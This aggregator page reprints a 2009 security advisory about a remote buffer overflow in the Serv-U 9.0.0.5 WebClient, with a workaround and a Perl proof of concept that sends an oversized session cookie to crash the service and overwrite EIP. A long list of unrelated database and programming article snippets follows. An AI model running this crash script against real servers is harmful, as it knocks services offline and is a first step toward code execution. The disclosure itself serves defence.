店主刘涛
店主刘涛

oracle cve 2015 4873,CVE-2009-4873 Rhinosoft Serv-U Web客户端HTTP请求远程溢出漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客,安全资讯...

-- KC Security PUBLIC ADVISORY -- http://www.rangos.de --

11-01-2009

RhinoSoft.com Serv-U 9.0.0.5 WebClient Remote Buffer Overflow

Background

------------

Serv-U includes a simple, browser-based transfer client perfect

for every business environment. The Web Client is accessed through

a standard web browser and features an unintimidating, familiar interface.

It is a great way for sharing photos and image files with clients and

co-workers due to its configurable thumbnail view that allows remote

images to be quickly viewed without downloading the entire file.

An additional slideshow view offers a fast way to share a collection

of photos from your latest projects. When using Serv-U, photo sharing

sites and large email attachments are a thing of the past!

Description

------------

Remote exploitation of a buffer overflow in the Serv-U WebClient

may allow attackers to execute arbitrary code.

The problem lies in the handling of overly long Session Cookies.

When a very long session cookie is sent to the Serv-U WebClient

HTTP Service an overrun occurs and EIP becomes "overwritten".

Detection

------------

KC Security confirmed the vulnerability in the latest version of Serv-U

WebClient which is 9.0.0.5.

Workaround

------------

Disable the WebClient Service and use the Serv-U FTP/SFTP components only.

Proof of concept

------------

The following PERL script will crash the Serv-U.exe service and overwrite

EIP with 0xAAAAAAAA.

---snip---

use IO::Socket;

$|=1;

$a = "A" x 100000;

my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => '80',

Proto => 'tcp');

print $sock "POST / HTTP/1.1\r\n"

."Host: $ARGV[0]\r\n"

."Cookie: killmenothing; SULang=de%2CDE; themename=vista; Session=_d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb950754581406246bf8$a\r\n"

."Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\n"

."Content-Length: 0\r\n\r\n";

while () {

print;

}

---snip---

Credit

------------

This vulnerability was discovered by Nikolaos Rangos of KC Security.

Visit us at http://www.rangos.de

你可能感兴趣的:(oracle,cve,2015,4873)

  • Windows下Oracle安装图解 叫我老村长
    Windows下Oracle安装图解----oracle-win-64-11g详细安装步骤一、Oracle下载官方下地址http://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.htmlwin32位操作系统下载地址:http://download.oracle.com/otn/nt/oracle11g
  • 免费版 Navicat Premium Lite 17 下载和使用 曼巴不黑 数据库navicatnavicat免费
    >>>>>>下载地址以后不需要再为使用Navicat大费周章了,官网已经提供免费版供个人和初创企业使用,认准NavicatPremiumLite。NavicatPremiumLite是Navicat的精简版,它包含了用户执行主要的基本数据库操作所需的核心功能。它允许你同时连接到各种数据库平台,包括MySQL、PostgreSQL、SQLServer、Oracle、MariaDB、Snowflake
  • 作为一名资深Oracle EBS顾问 如何在MetaERP的实施过程中发挥自己的作用 anpeng2025 OracleERP华为MetaERPSAP专题零售oraclemetaerporacleerpOracleebs华为MetaERP
    作为一名资深OracleEBS顾问如何在MetaERP的实施过程中发挥自己的作用作为资深OracleEBS顾问,在MetaERP实施过程中(尤其是系统构建、测试、上线等中后期阶段),您的作用将从战略规划层面向战术执行纵深推进,成为项目落地的“压舱石”和“救火队长”。以下是关键发力点及实战策略:一、系统构建阶段:将方案转化为可执行架构1.主导核心配置与开发决策配置陷阱规避➤预判配置冲突点(如多组织架
  • ORA-12547: TNS:lost contact+oracle 开启监听失败 勤径苦舟 oracle
    1、ORA-12547:TNS:lostcontact[root@dbserver/]#sqlplussys/xiniu123assysdbaSQL*Plus:Release12.2.0.1.0ProductiononSatAug2612:55:342017Copyright(c)1982,2016,Oracle.Allrightsreserved.ERROR:ORA-12547:TNS:lost
  • 数据库管理工具Navicat Premium 12 mythmayor Tools数据库数据库管理工具数据库管理NavicatPremiumNavicat
    转载请注明出处:https://blog.csdn.net/mythmayor/article/details/89560919NavicatPremium是一套多连接数据库开发工具,让你在单一应用程序中同时连接多达七种数据库:MySQL、MariaDB、MongoDB、SQLServer、SQLite、Oracle和PostgreSQL,可一次快速方便地访问所有数据库。安装包及破解教程下载:已将
  • Flink Oracle CDC logminer ogg 对比, PDB logminer CDC 测试
    维度FlinkCDC(主库)FlinkCDC(备库)Flinkconnector(Kafka)ADG(ActiveDataGuard)同步机制基于LogMiner解析RedoLog需通过OGG同步备库基于LogMiner解析RedoLog需通过OGG捕获日志后写入Kafka物理复制,主备数据块一致架构特点需直连主库独立进程,低侵入性独立进程,低侵入性仅支持查询,无法捕获实时变更数据链路oracle
  • 深入详解K近邻算法(KNN):基本概念、原理及在医学影像领域的应用与实现 猿享天开 近邻算法算法医学影像人工智能机器学习大模型
    博主简介:CSDN博客专家、CSDN平台优质创作者,高级开发工程师,数学专业,10年以上C/C++,C#,Java等多种编程语言开发经验,拥有高级工程师证书;擅长C/C++、C#等开发语言,熟悉Java常用开发技术,能熟练应用常用数据库SQLserver,Oracle,mysql,postgresql等进行开发应用,熟悉DICOM医学影像及DICOM协议,业余时间自学JavaScript,Vue,
  • 机器学习模型评估:交叉验证、混淆矩阵、ROC曲线及其在医学影像领域的应用 猿享天开 机器学习矩阵人工智能DICOM医学影像模型评估
    博主简介:CSDN博客专家、CSDN平台优质创作者,高级开发工程师,数学专业,10年以上C/C++,C#,Java等多种编程语言开发经验,拥有高级工程师证书;擅长C/C++、C#等开发语言,熟悉Java常用开发技术,能熟练应用常用数据库SQLserver,Oracle,mysql,postgresql等进行开发应用,熟悉DICOM医学影像及DICOM协议,业余时间自学JavaScript,Vue,
  • 宝塔开放php openssl,[教程]Centos宝塔面板升级openssl增强nginxSSL安全性,openssl开启Http/2,Centos升级openssl... weixin_39956353 宝塔开放phpopenssl
    由于本站是采用的Centos7+宝塔面板搭建的LNMP环境,但是Centos7默认的openssl版本又太低,根据“漏洞参考这里:https://www.trustasia.com/OpenSSL-CVE-2016-2107-Padding-Oracle”查看这篇文章发现openssl低版本已经有一堆漏洞了,所以就萌生了升级openssl版本的想法。配置完后如图:openssl版本低会导致无论你怎
  • 医疗单位 Oracle 数据库统计分析实战指南 caifox菜狐狸 Oracle相关知识笔记OraclePL/SQL编程入门数据库oracle统计分析GROUPBY多表查询聚合函数时间序列
    在当今数字化时代,医疗单位积累了海量的患者数据、诊疗记录、药品信息等,这些数据蕴含着巨大的价值。通过有效的统计分析,医疗单位可以优化资源配置、提升医疗服务质量、辅助临床决策、开展医学研究等。而Oracle数据库作为医疗信息系统中广泛使用的数据库管理系统,具备强大的数据存储和处理能力,为医疗数据的统计分析提供了坚实的基础。本教程旨在为医疗单位的数据库管理人员、数据分析人员以及相关技术人员提供一份实用
  • CVE-2025-6018 和 CVE-2025-6019漏洞引发的思考 深海科技服务 行业发展网络安全web安全程序人生java个人开发操作系统
    一、CVE-2025-6018和CVE-2025-6019漏洞对麒麟和统信UOS系统有影响吗?这两个漏洞确实对麒麟和统信UOS系统有影响。根据最新的信息,可以明确如下:1、CVE-2025-6018:LinuxPAM权限提升漏洞这个漏洞存在于LinuxPAM(可插拔认证模块)的配置中,可能允许远程登录系统的低权限用户获得polkit策略的“allow_active”认证,从而拥有与机器本地用户相同
  • MySql数据库基础
    数据库相关概念•数据库是按数据结构组织、存储和管理数据的仓库,本质是文件系统;数据库管理系统是操纵和管理数据库的大型软件,用户和管理员通过它访问和维护数据库。•介绍了关系型数据库管理系统(如MySQL、Oracle等)和NoSQL数据库(如Redis、MongoDB等),前者基于关系模型用表格存储数据,后者非关系型,有键值、列族等多种类型。MySQL简介与安装配置•MySQL是开源的关系型数据库管
  • SQL Developer Data Modeler:一款免费跨平台的数据库建模工具 不剪发的Tony老师 数据库数据库设计ERD
    SQLDeveloperDataModeler是由Oracle公司开发的一款免费的图形化数据建模和数据库设计工具,用于创建、浏览和编辑逻辑模型、关系模型、物理模型、多维模型和数据类型模型。SQLDeveloperDataModeler既是一个独立的应用程序,同时也被集成到了OracleSQLDeveloper开发工具中。功能特性SQLDeveloperDataModeler工具提供的主要功能如下:
  • pandas 读取sqlserver_Python中pandas函数操作数据库
    将pandas的DataFrame数据写入MySQL+sqlalchemypython强大的处理数据的能力很大一部分来自Pandas,pandas不仅限于读取本地的离线文件,也可以在线读取数据库的数据,处理后再写回数据库中。pandas主要是以sqlalchemy方式与数据库建立链接,支持Mysql、postgresql、Oracle、MSSQLServer、SQLite等主流数据库。一:创建链接
  • oracle health check,ORACLE SQL Tuning Health-Check(SQLHC) 爱护哼哼 oraclehealthcheck
    一条sql语句的性能主要依赖于好的物理结构,准确的系统统计数据,准确的对象统计数据,合理的查询优化器参数,合理的系统参数.这些数据也就是CBO计算的基本参数,SQLHC(文档ID1366133.1)正是为用户提供sql的这些数据,来辅助sql调优.特别适合无法在客户环境中调优的情况,SQLHC虽然没有SQLT(文档ID215187.1)更强大,但不需要在采集的库上建用户,会被更多的客户所接受.以下
  • ogg同步Kafka到oracle,ORACLE OGG同步到KAFKA
    ORACLEOGG同步到KAFKA1、介绍Kafka是一种高效的消息队列实现,经过订阅kafka的消息队列,下游系统能够实时获取在线Oracle系统的数据变动状况,实现业务系统javaogg同步全量数据方式:①经过数据泵方式基于SCN导出并导入到目标端,此方式用于Oracle到Oracle的ogg同步环境中。②经过ogg自己的初始化方式,初始化全量数据到目标端,此方式通用于全部环境,可是速度相对较
  • oracle ogg 全量 增量,1.利用ogg实现oracle到kafka的增量数据实时同步.md
    ##利用ogg实现oracle到kafka的增量数据实时同步####前言>ogg即OracleGoldenGate是Oracle的同步工具,本文讲如何配置ogg以实现Oracle数据库增量数据实时同步到kafka中,其中同步消息格式为json。下面是源端和目标端的一些配置信息:|--|版本|OGG版本|IP|别名||:---------|:--:|-----------:|:-----------
  • MYSQL 知识点总结 代码o>_ mysql数据库nosql
    第一章MYSQL基础数据库(database)是一个按照结构来组织存储和管理数据的仓库一般由软件,数据库和管理员组成。数据模型:数据库由层次,网状,关系,面向对象,NOSQL五个模型组成数据库系统:一般由软件,数据库和管理员组成。当前主流的数据库:MySQL,Oracle,SQLServer,PostgreSQL,MongoDB,Redis当前使用较多是MySQL,版本为5.7MySQL的特点:运
  • 对于DBMS_METADATA API的正确使用方式 jnrjian oraclesql
    对于DBMS_METADATAAPI的正确使用方式Oracle蓝莲花2021-04-152702-----------------------------------------------------------------------------------------------------------------TroubleShooting:对于DBMS_METADATAAPI的正确使用
  • 在线重定义 online redefinition
    ThefollowingexampledemonstratesonlineredefinitionwithFILE_DATASTOREandresizingatextcolumnprompt>echo"HelloWorld">/home/oracle/world.txtprompt>echo"HelloOracle">/home/oracle/oracle.txtprompt>echo"Hello
  • oracle Health Monitor duncanboy oracleHealthMonitororacle
    AboutHealthMonitorBeginningwithRelease11g,OracleDatabaseincludesaframeworkcalledHealthMonitorforrunningdiagnosticchecksonthedatabase.AboutHealthMonitorChecksHealthMonitorchecks(alsoknownascheckers,hea
  • Oracle Text Health Check jnrjian oraclesql
    RemRemRemsrdc_Text_Health_Check.sqlRemRemCopyright(c)2012,2023,Oracleand/oritsaffiliates.RemAllrightsreserved.RemRemNAMERemsrdc_text_healthcheck.sql-OracleTextHealthCheckRemRemDESCRIPTIONRemCalledbydb
  • Hbase简介 三五a hbase数据库大数据
    一.非关系型数据库:1.1介绍:非关系型数据库(NoSQLDatabase)是相对于传统关系型数据库而言的一类新型数据库技术,其设计目的是解决大规模数据存储、高并发访问、灵活数据结构等场景下的问题。与关系型数据库(如MySQL、Oracle)依赖固定表结构和SQL查询不同,非关系型数据库通常采用更灵活的数据模型,且不强制遵循ACID(原子性、一致性、隔离性、持久性)事务特性的严格约束。1.2分类:
  • Apache HTTP Server 2.4.50 中的路径遍历和文件泄露漏洞 (CVE-2021-42013)实验报告 shidfe 笔记apachehttp安全
    视频演示ApacheHTTPServer2.4.50中的路径遍历和文件泄露漏洞(CVE-2021-42013)实验演示_哔哩哔哩_bilibiliBGM:《芳华慢》+《霜雪千年》(by等什么君)https://www.bilibili.com/video/BV1Va411C7gW?spm_id_from=333.999.0.0参考文章Vulhub-Docker-Composefileforvuln
  • Apache HTTP Server 2.4.49 的目录遍历漏洞CVE-2021-41773
    一、ApacheHTTPServer2.4.49的目录遍历漏洞介绍CVE-2021-41773是一个影响ApacheHTTPServer2.4.49的目录遍历漏洞,允许远程攻击者绕过访问控制限制读取系统上任意文件。在某些配置下,它还可以进一步导致远程代码执行(RCE)。这个漏洞被加密货币矿工(如Linuxsys)所利用,构建了完整的攻击链用于传播恶意挖矿程序。下面是对此漏洞和“Linuxsys”矿
  • 【Oracle】ORA-00257: 归档程序错误 -XWB- Oracleoracle
    一、出现该问题先确认磁盘空间使用率df-lh查看(这里是因为我处理后的图,报错时/oradata的使用率是100%的)二、查看是/oradata哪个目录下的文件占用空间du-h--max-depth=1路径逐个目录排查下去三、当确认是arch目录下的.arc文件占用磁盘空间时,即判定时归档日志文件过大导致的问题。接下来就是要对归档日志文件进行清理了。四、进入到oracle用户,在进入rman工具。
  • 【Oracle】套接字异常(SocketException)背后隐藏的Oracle问题:ORA-03137深度排查与解决之道 -XWB- Oracleoracle数据库
    在日常的系统运维和应用开发中,我们经常会遇到一个令人头疼的问题:“套接字异常(SocketException)”,例如:java.net.SocketException:Connectionresetjava.sql.SQLRecoverableException:IOError:Socketreadtimedout这类异常通常被认为是网络问题、连接池配置问题,甚至是客户端代码问题。但你是否想过,
  • mysql page header_由InnoDB: Space id in fsp header ,but in the page header 展开的思考
    首先说明我是做ORACLE的,但是工作需要,并且加上兴趣,现在正在学习INNODB。如果有不对的结论大家一起讨论,在这篇文章中修改了块的字节,没有出现问题,而ORACLE却是不能随意修改的,因为他有自己的一套算法来计算CHECKSUM。但是几个小工具可以有助大家学习和研究!谢谢!今天启动MYSQL的时候发现如下问题:2015-12-1420:51:592098[ERROR]InnoDB:Space
  • mysql 5.7 开启innodb_MySQL 5.7 优化InnoDB配置 weixin_39864591 mysql5.7开启innodb
    InnoDB给MySQL提供了具有提交,回滚和崩溃恢复能力的事务安全(ACID兼容)存储引擎。InnoDB锁定在行级并且也在SELECT语句提供一个Oracle风格一致的非锁定读。这些特色增加了多用户部署和性能。没有在InnoDB中扩大锁定的需要,因为在InnoDB中行级锁定适合非常小的空间。InnoDB也支持FOREIGNKEY强制。在SQL查询中,你可以自由地将InnoDB类型的表与其它MyS
  • MYSQL面试题汇总(建以Mark!!)
    1.什么是MySQL?它与其他数据库(如Oracle、PostgreSQL)有何不同?答案:MySQL是一个开源的关系型数据库管理系统(RDBMS),使用SQL管理数据,广泛用于Web应用,因其性能高、易用和可扩展性强而受欢迎。与Oracle对比:MySQL开源免费,适合中小型应用;Oracle是商业数据库,功能强大,适合大型企业系统。与PostgreSQL对比:PostgreSQL支持复杂数据类
  • eclipse maven IXHONG eclipse
    eclipse中使用maven插件的时候,运行run as maven build的时候报错 -Dmaven.multiModuleProjectDirectory system propery is not set. Check $M2_HOME environment variable and mvn script match.   可以设一个环境变量M2_HOME指
  • timer cancel方法的一个小实例 alleni123 多线程timer
    package com.lj.timer; import java.util.Date; import java.util.Timer; import java.util.TimerTask; public class MyTimer extends TimerTask { private int a; private Timer timer; pub
  • MySQL数据库在Linux下的安装 ducklsl mysql
    1.建好一个专门放置MySQL的目录 /mysql/db数据库目录 /mysql/data数据库数据文件目录 2.配置用户,添加专门的MySQL管理用户 >groupadd mysql ----添加用户组 >useradd -g mysql mysql ----在mysql用户组中添加一个mysql用户 3.配置,生成并安装MySQL >cmake -D
  • spring------>>cvc-elt.1: Cannot find the declaration of element Array_06 springbean
    将-------- <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans"     xmlns:xsi="http://www.w3
  • maven发布第三方jar的一些问题 cugfy maven
    maven中发布 第三方jar到nexus仓库使用的是 deploy:deploy-file命令 有许多参数,具体可查看 http://maven.apache.org/plugins/maven-deploy-plugin/deploy-file-mojo.html 以下是一个例子: mvn  deploy:deploy-file -DgroupId=xpp3
  • MYSQL下载及安装 357029540 mysql
        好久没有去安装过MYSQL,今天自己在安装完MYSQL过后用navicat for mysql去厕测试链接的时候出现了10061的问题,因为的的MYSQL是最新版本为5.6.24,所以下载的文件夹里没有my.ini文件,所以在网上找了很多方法还是没有找到怎么解决问题,最后看到了一篇百度经验里有这个的介绍,按照其步骤也完成了安装,在这里给大家分享下这个链接的地址
  • ios TableView cell的布局 张亚雄 tableview
      cell.imageView.image = [UIImage imageNamed:[imageArray objectAtIndex:[indexPath row]]];           CGSize itemSize = CGSizeMake(60, 50);   &nbs
  • Java编码转义 adminjun java编码转义
    import java.io.UnsupportedEncodingException; /** * 转换字符串的编码 */ public class ChangeCharset { /** 7位ASCII字符,也叫作ISO646-US、Unicode字符集的基本拉丁块 */ public static final Strin
  • Tomcat 配置和spring aijuans spring
    简介 Tomcat启动时,先找系统变量CATALINA_BASE,如果没有,则找CATALINA_HOME。然后找这个变量所指的目录下的conf文件夹,从中读取配置文件。最重要的配置文件:server.xml 。要配置tomcat,基本上了解server.xml,context.xml和web.xml。 Server.xml --  tomcat主
  • Java打印当前目录下的所有子目录和文件 ayaoxinchao 递归File
    其实这个没啥技术含量,大湿们不要操笑哦,只是做一个简单的记录,简单用了一下递归算法。   import java.io.File; /** * @author Perlin * @date 2014-6-30 */ public class PrintDirectory { public static void printDirectory(File f
  • linux安装mysql出现libs报冲突解决 BigBird2012 linux
    linux安装mysql出现libs报冲突解决 安装mysql出现 file /usr/share/mysql/ukrainian/errmsg.sys from install of MySQL-server-5.5.33-1.linux2.6.i386 conflicts with file from package mysql-libs-5.1.61-4.el6.i686  
  • jedis连接池使用实例 bijian1013 redisjedis连接池jedis
    实例代码: package com.bijian.study; import java.util.ArrayList; import java.util.List; import redis.clients.jedis.Jedis; import redis.clients.jedis.JedisPool; import redis.clients.jedis.JedisPoo
  • 关于朋友 bingyingao 朋友兴趣爱好维持
      成为朋友的必要条件:    志相同,道不合,可以成为朋友。譬如马云、周星驰一个是商人,一个是影星,可谓道不同,但都很有梦想,都要在各自领域里做到最好,当他们遇到一起,互相欣赏,可以畅谈两个小时。     志不同,道相合,也可以成为朋友。譬如有时候看到两个一个成绩很好每次考试争做第一,一个成绩很差的同学是好朋友。他们志向不相同,但他
  • 【Spark七十九】Spark RDD API一 bit1129 spark
    aggregate package spark.examples.rddapi import org.apache.spark.{SparkConf, SparkContext} //测试RDD的aggregate方法 object AggregateTest { def main(args: Array[String]) { val conf = new Spar
  • ktap 0.1 released bookjovi kerneltracing
    Dear, I'm pleased to announce that ktap release v0.1, this is the first official release of ktap project, it is expected that this release is not fully functional or very stable and we welcome bu
  • 能保存Properties文件注释的Properties工具类 BrokenDreams properties
            今天遇到一个小需求:由于java.util.Properties读取属性文件时会忽略注释,当写回去的时候,注释都没了。恰好一个项目中的配置文件会在部署后被某个Java程序修改一下,但修改了之后注释全没了,可能会给以后的参数调整带来困难。所以要解决这个问题。     &nb
  • 读《研磨设计模式》-代码笔记-外观模式-Facade bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /* * 百度百科的定义: * Facade(外观)模式为子系统中的各类(或结构与方法)提供一个简明一致的界面, * 隐藏子系统的复杂性,使子系统更加容易使用。他是为子系统中的一组接口所提供的一个一致的界面 * * 可简单地
  • After Effects教程收集 cherishLC After Effects
    1、中文入门 http://study.163.com/course/courseMain.htm?courseId=730009 2、videocopilot英文入门教程(中文字幕) http://www.youku.com/playlist_show/id_17893193.html 英文原址: http://www.videocopilot.net/basic/ 素
  • Linux Apache 安装过程 crabdave apache
    Linux Apache 安装过程   下载新版本: apr-1.4.2.tar.gz(下载网站:http://apr.apache.org/download.cgi) apr-util-1.3.9.tar.gz(下载网站:http://apr.apache.org/download.cgi) httpd-2.2.15.tar.gz(下载网站:http://httpd.apac
  • Shell学习 之 变量赋值和引用 daizj shell变量引用赋值
    本文转自:http://www.cnblogs.com/papam/articles/1548679.html Shell编程中,使用变量无需事先声明,同时变量名的命名须遵循如下规则: 首个字符必须为字母(a-z,A-Z) 中间不能有空格,可以使用下划线(_) 不能使用标点符号 不能使用bash里的关键字(可用help命令查看保留关键字) 需要给变量赋值时,可以这么写:
  • Java SE 第一讲(Java SE入门、JDK的下载与安装、第一个Java程序、Java程序的编译与执行) dcj3sjt126com javajdk
    Java SE 第一讲: Java SE:Java Standard Edition Java ME: Java Mobile Edition Java EE:Java Enterprise Edition Java是由Sun公司推出的(今年初被Oracle公司收购)。 收购价格:74亿美金 J2SE、J2ME、J2EE JDK:Java Development
  • YII给用户登录加上验证码 dcj3sjt126com yii
    1、在SiteController中添加如下代码: /** * Declares class-based actions. */ public function actions() { return array( // captcha action renders the CAPTCHA image displ
  • Lucene使用说明 dyy_gusi Lucenesearch分词器
    Lucene使用说明 1、lucene简介 1.1、什么是lucene     Lucene是一个全文搜索框架,而不是应用产品。因此它并不像baidu或者googleDesktop那种拿来就能用,它只是提供了一种工具让你能实现这些产品和功能。 1.2、lucene能做什么     要回答这个问题,先要了解lucene的本质。实际
  • 学习编程并不难,做到以下几点即可! gcq511120594 数据结构编程算法
    不论你是想自己设计游戏,还是开发iPhone或安卓手机上的应用,还是仅仅为了娱乐,学习编程语言都是一条必经之路。编程语言种类繁多,用途各 异,然而一旦掌握其中之一,其他的也就迎刃而解。作为初学者,你可能要先从Java或HTML开始学,一旦掌握了一门编程语言,你就发挥无穷的想象,开发 各种神奇的软件啦。 1、确定目标 学习编程语言既充满乐趣,又充满挑战。有些花费多年时间学习一门编程语言的大学生到
  • Java面试十问之三:Java与C++内存回收机制的差别 HNUlanwei javaC++finalize()堆栈内存回收
    大家知道, Java 除了那 8 种基本类型以外,其他都是对象类型(又称为引用类型)的数据。 JVM 会把程序创建的对象存放在堆空间中,那什么又是堆空间呢?其实,堆( Heap)是一个运行时的数据存储区,从它可以分配大小各异的空间。一般,运行时的数据存储区有堆( Heap)和堆栈( Stack),所以要先看它们里面可以分配哪些类型的对象实体,然后才知道如何均衡使用这两种存储区。一般来说,栈中存放的
  • 第二章 Nginx+Lua开发入门 jinnianshilongnian nginxlua
    Nginx入门 本文目的是学习Nginx+Lua开发,对于Nginx基本知识可以参考如下文章: nginx启动、关闭、重启 http://www.cnblogs.com/derekchen/archive/2011/02/17/1957209.html agentzh 的 Nginx 教程 http://openresty.org/download/agentzh-nginx-tutor
  • MongoDB windows安装 基本命令 liyonghui160com
      windows安装    安装目录:   D:\MongoDB\   新建目录   D:\MongoDB\data\db   4.启动进城:   cd D:\MongoDB\bin   mongod -dbpath D:\MongoDB\data\db   &n
  • Linux下通过源码编译安装程序 pda158 linux
    一、程序的组成部分   Linux下程序大都是由以下几部分组成:   二进制文件:也就是可以运行的程序文件   库文件:就是通常我们见到的lib目录下的文件   配置文件:这个不必多说,都知道   帮助文档:通常是我们在linux下用man命令查看的命令的文档    二、linux下程序的存放目录   linux程序的存放目录大致有三个地方:   /etc, /b
  • WEB开发编程的职业生涯4个阶段 shw3588 编程Web工作生活
    觉得自己什么都会 2007年从学校毕业,凭借自己原创的ASP毕业设计,以为自己很厉害似的,信心满满去东莞找工作,找面试成功率确实很高,只是工资不高,但依旧无法磨灭那过分的自信,那时候什么考勤系统、什么OA系统、什么ERP,什么都觉得有信心,这样的生涯大概持续了约一年。 根本不是自己想的那样 2008年开始接触很多工作相关的东西,发现太多东西自己根本不会,都需要去学,不管是asp还是js,
  • 遭遇jsonp同域下变作post请求的坑 vb2005xu jsonp同域post
    今天迁移一个站点时遇到一个坑爹问题,同一个jsonp接口在跨域时都能调用成功,但是在同域下调用虽然成功,但是数据却有问题. 此处贴出我的后端代码片段 $mi_id = htmlspecialchars(trim($_GET['mi_id '])); $mi_cv = htmlspecialchars(trim($_GET['mi_cv ']));  贴出我前端代码片段: $.aj
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他